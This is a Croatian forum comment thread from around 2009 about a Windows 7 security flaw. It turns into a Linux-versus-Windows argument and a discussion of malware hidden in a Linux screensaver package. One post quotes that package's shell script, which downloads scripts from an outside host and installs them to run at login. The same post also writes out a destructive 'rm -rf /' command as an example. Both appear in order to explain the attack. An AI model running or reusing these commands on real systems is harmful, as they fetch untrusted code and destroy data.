Propust u Windowsima 7

poruka: 77
|
čitano: 9.889
+/- sve poruke
ravni prikaz
starije poruke gore
Ovo je tema za komentiranje sadržaja Bug.hr portala. U nastavku se nalaze komentari na "Propust u Windowsima 7".
18 godina
RE: Propust u Windowsima 7
(s)izgoreo kaže...

šta ovaj gore napad košta 1500kn ili bug, a linux zajednica dijeli propuste besplatno? PRETJERUJEŠ

citiram ljude s computerworld.com-a i pokušavam upoznati korisnike ovog foruma koje su opasnosti koje ih čekaju dok ne zakrpaju svoje win7 koje su uredno platili. ne vidim da se igdje spominje linux u tom postu. sve sam lijepo argumentirao.

Sve što sam napisao nije moje mišljenje. Vjerovatno se nisam odlogirao pa ovo piše ili moj brat ili mama
18 godina
neaktivan
hrvooje kaže...

citiram ljude s computerworld.com-a i pokušavam upoznati korisnike ovog foruma koje su opasnosti koje ih čekaju dok ne zakrpaju svoje win7 koje su uredno platili. ne vidim da se igdje spominje linux u tom postu. sve sam lijepo argumentirao.

a tko cijelo vrijeme razvlači linux po temi? brat ili mama?

sviđa mi se da ti nebude prijatno
16 godina
neaktivan

hm, nisam testirao explojt jer bas nemam vremena (fax i te stvari) - ovog vikenda (kad imam vise vremena) cu testirati navedeni explojt (objavljen na blogu od jednog francuza) u VirtualBoxu.
Na prvi pogled ne cini mi se da imas pravo, ali pazi i "stability explojti" mogu napraviti "cuda" na sustavu takodjer. Vec znam da ce pisci rootkita/virusa/svakakvog smeca jednostavno iskoristavati propust.
I nevjerovatno je da jedan 6 kilobajtni explojt moze "srediti" Win7cu - tako da joj skoci CPU time 100%. 
I sam' se cudim kako M$ nije vec jednom rijesio se sigurnosnih rupa na kriticnim servisima od Windowsa. Ako se tko sjeca Blaster/Sasser crva koji su radili cuda na XP-u, a unatoc tome sto M$ je preslabo osigurao kriticne mrezne servise Windowsa.
XP platforma je definitivno najgora po statusu sigurnosti - ali kada se XP zapatcha nema problema onda nikakvih, onda samo rade svoj pos'o AV/AS alati koji se vrte u memoriji.

Vista/Win7 su definitivno sigurniji (i zbog "dosadnog" UAC-a) od XP-a, ali opet nevjerovatna je cinjenica u tome svemu da je XP zapravo 100% imun sto se tice navedenog propusta.

Zivjeli!

P.S drzite se teme, ovi teenagerski flejmovi tipa Linux vs. Windows su i meni vec jednostavno dopi*** za gledanje.
NITI JEDAN OS NIJE SIGURAN - i to je bit svega, svagdje postoje pisani explojti, ono sto je trenutno u bazi secunia.com - to je samo 60% POZNATIH sigurnosnih problema, a gdje su jos rootkiti i ostala banda?

There's no place like (127.0.0.1) home. . .
Poruka je uređivana zadnji put uto 17.11.2009 14:34 (g33k).
18 godina
Propust u Windowsima 7

@slepix

ako je tih 800 virusa napisanih puno na 0.94% zašto onda po toj propocionalnoj analogiji ovdje na bug forumu koji kaže da ima 4% korisnika linuxa i još 24% ljudi koristi i windows i linux nema tema : "help, zaražen sam linux virusom! " , a znamo da na win podforumu takve teme niču kao gljive poslije kiše.  to je zato jer tih 800 virusa nikad nije zaživjelo, jer je teško sakrit binarni file u open sourceu.

a što se tiče analogije s autom, može se reći i da je kriv i proizvođač auta, jer nije ugradio kontorlu goriva koje koristi pa ga je lako nadmudrit. a kriva je i benziska crpka, jer na pištolju nema kontorlu kvalitete goriva i omogućuje malverzaciju. dokle god ne dobiješ labaratorijski nalaz nikad nećeš znati kakvo si gorivo nasuo. a isprintani labaratorijski nalaz je open source kod.  :) (al ga i ja sad ser....)

Sve što sam napisao nije moje mišljenje. Vjerovatno se nisam odlogirao pa ovo piše ili moj brat ili mama

0 0 hvala 0
16 godina
protjeran

a ja imam većega...Namigiva šala mala ..ne zamjerite....gle...windowsima je u TEMELJIMA hrpa sigurnosnih rupa..baš zato se izdaju razni pečevi(hehehehe)....win je dobar,stabilan i siguran dok se ne spoji u mrežu...e tu se pokazuju svi nedostatci..jer PRIMARNO,kod mu nije bio predviđen za mrežu....sve ostalo je dodavanje....naravno..nijedan os nije full imun...ali je definitivno linux zreliji i ozbiljniji OS..iako je open source....

18 godina
(s)izgoreo kaže...
hrvooje kaže...

a tko cijelo vrijeme razvlači linux po temi? brat ili mama?

kuzo je na prvoj stranici prvi spomenio linux. ja sam o linuxu replicirao slepixu koji ga je također spomenio prije mene i sve smo lijepo argumentirali. sve pet, sve civilizirano, sve do tvog "lame" komentara. 

18 godina
neaktivan
hrvooje kaže...

kuzo je na prvoj stranici prvi spomenio linux. ja sam o linuxu replicirao slepixu koji ga je također spomenio prije mene i sve smo lijepo argumentirali. sve pet, sve civilizirano, sve do tvog "lame" komentara. 

eh, moj lame komentar na koji si se ulovio je drugi na ovoj temi..

(s)izgoreo kaže...

pa baš i nije neki

...tako da u stvari raspravljaš sa stevan94 cijelo vrijeme, koji uopće ne spominje linux, a tvoje su "baljezgarije" (u neskladu sa vremenom i prostorom) cijelo vrijeme OT ... skupa sa komentarima tvog sugovornika i samnom koji se našao dovoljno "ludim" da na njih odgovara

sviđa mi se da ti nebude prijatno
Poruka je uređivana zadnji put uto 17.11.2009 16:59 ((s)izgoreo).
17 godina
neaktivan

i poceo je flame..ja sam zavrsio sa ovom temom. Pozdrav

Personal Geek Blog - http://www.winblogs.net
18 godina
Propust u Windowsima 7

Linux i M$ ne mogu se sporediti, oni su totalno razlicni sustavi. Ko je programer zna da programiranje na Linux-u nema veze sa programiranjem na Windows OS. A to da Linux ima bugova, pa pogledajte kernel.org i ostale web sajtove, imaju oni mnogo mnogo bugova sto je i normalno za softver tih razmera. Pa i obicni 'Kalkulator' ima bugova a ne OS koji ima nekoligo GB source koda.

Niko nije pokrenuo temu, zasto ljudi uvek traze neke propuste i rupe da probiju neki kompjuter, da ukradu neki fajl ili preuzmu kontrolu nad kompjuterom.

Moj PC  
0 0 hvala 0
17 godina
neaktivan

znam da je dizanje teme iz mrtvih, ali nazalost pocinje ono sto sam tvrdio u ovom threadu, cim linux naraste, krenuti ce i virusi : http://linux.slashdot.org/story/09/12/09/2215253/Malware-Found-Hidden-In-Screensaver-On-Gnome-Look ...i to na istu spiku kao i na windozama...screen saver :(

18 godina
Propust u Windowsima 7

Sad ce bit izjava "Pa koji to hard core linuxas stavlja screensaver, ono, mislim, jesi normalan!?"

I'm going woo woo

1 0 hvala 0
18 godina
slepix kaže...

znam da je dizanje teme iz mrtvih, ali nazalost pocinje ono sto sam tvrdio u ovom threadu, cim linux naraste, krenuti ce i virusi : http://linux.slashdot.org/story/09/12/09/2215253/Malware-Found-Hidden-In-Screensaver-On-Gnome-Look ...i to na istu spiku kao i na windozama...screen saver :(

da si malo bolje pročitao znao bi da je ovo čisti socijalni inžinjering ... kao da ja tebi kažem ajde obriši disk i to napraviš i kažeš "vau, novi virus" . lik je instalirao .deb paket van repozitorija. dakle taj .deb paket je mogao sastaviti bilo tko. i onda ga je lik pokrenio s admin ovlastima. a u tom paketu je bila skripta:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

koja kaže da obriše neke fileove, neke skine i doda im pravo izvođenja prilikom dizanja sustava. krajnji cilj je bio pinganje wwowned.com što se naravno može promijenit u bilo šta. poanta - svi paketi van repozitorija mogu biti potencijalno opasni ako je izvor nepovjerljiv. ovo nije virus.

svatko može napraviti skriptu s komandom npr. (nemojte ovo pokretati kao root!) "rm -rf /" i opla, ode cijeli sistem. to spakirat kao .deb i ponuditi za download.

Poruka je uređivana zadnji put čet 10.12.2009 22:41 (hrvooje).
17 godina
neaktivan

ok, ajde mi onda reci kako se na windozama pokupe virusi..ne instalira se originalan softver, nego neki super duper extra speeded up version koji je skinut sa torrenta ( analogija - nije skinut sa official repozitorija). ....kuzis,  nije poanta tko je kriv, nego je poanta da se vidi da se i za linuxe isto to moze napraviti...

18 godina

ne znam kako da ti kažem da ovo nije virus. netko je spakirao skriptu koja nešto radi u .deb i promijenio ime u skreensaver. netko je to skinio i pokrenio kao admin. greška, nije ju trebao pokretati kao admin. da to nije napravio ništa se ne bi desilo. i to je to. ti hoćeš reći i da se na linuxu može promijeniti ime nekog filea, da se može napraviti vlastiti deb paket sa bilo kojom sadržanom komandom unutra ... pa u biti u pravu si  

istaliranje softwarea s nepovjerljivih izvora kao root doista jeste manira koja se često vidi na windowsima. ovo je problem samo onogo što se nalazi između stolice i računala. ne iskorištava se nikakva rupa u sustavu ili slično kao kod  virusa. ovo je kao da si ostavio ključ u vratima auta i onda plačeš proizvođaču kako mu se lako provaljuje u auto.

Poruka je uređivana zadnji put čet 10.12.2009 23:47 (hrvooje).
17 godina
neaktivan

ok..ajde mi onda objasni definiciju virusa, molim te..

18 godina
slepix kaže...

ok..ajde mi onda objasni definiciju virusa, molim te..

na googleu pod upit "computer virus wiki" mi izbaci sljedeće:

"Računalni virus je program koji može "inficirati" druge programe tako da u njih unese kopiju samog sebe (koja može biti modificirana). Virus se može proširiti računalnim sustavom ili mrežom koristeći se ovlastima korisnika koji su inficirani. Svaki program koji je inficiran postaje virus i tako infekcija raste .

Računalni virus se obično sastoji od dva dijela

Prvi dio je kod koji omogućava razmnožavanje virusa

Drugi dio je korisni teret (payload) koji može biti bezopasan ili opasan."

Ova skripta koju je žrtva pokrenila kao root ne inficira druge programe da u njih unese samog sebe. ne širi se računalnim sustavom tj. ne razmožava se. 

16 godina
neaktivan
Propust u Windowsima 7

Virusi su badmadafakaSmijeh

When you are halfway up,you are always halfway down

0 0 hvala 0
Nova poruka
E-mail:
Lozinka:

vrh stranice